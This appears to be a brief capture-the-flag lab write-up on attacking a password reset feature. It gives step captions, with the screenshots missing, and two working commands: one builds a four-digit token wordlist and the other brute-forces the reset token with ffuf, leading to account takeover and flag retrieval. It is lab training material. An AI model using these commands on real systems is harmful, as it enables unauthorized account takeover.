In order to exploit the password reset functionallity we must first find the reset endpoint
Step 1 - Access the Web Application and Reset the Password:
Step 2 - Insert a username and click Submit:
Step 3 - Click on here:
Step 4 - Get the password reset token endpoint:
You'll get this warning. Click again on submit:
And we got the endpoint:
Step 4 - Brute-force the reset token:
Create a numeric wordlist with all possible combinations:
Use the wordlist to brute-force the token with ffuf:
Step 5 - Reset the password:
Insert the token at the end of the URL:
Change the password:
Step 6 - Retrieve the flag:
After reseting the password, login into the application with the credentials and retrieve the flag:
Last updated 9 months ago
seq -w 0 9999 > tokens.txt
ffuf -w ./tokens.txt -u http://SERVER_IP:SERVER_PORT/reset_password.php?token=FUZZ -fr "The provided token is invalid"
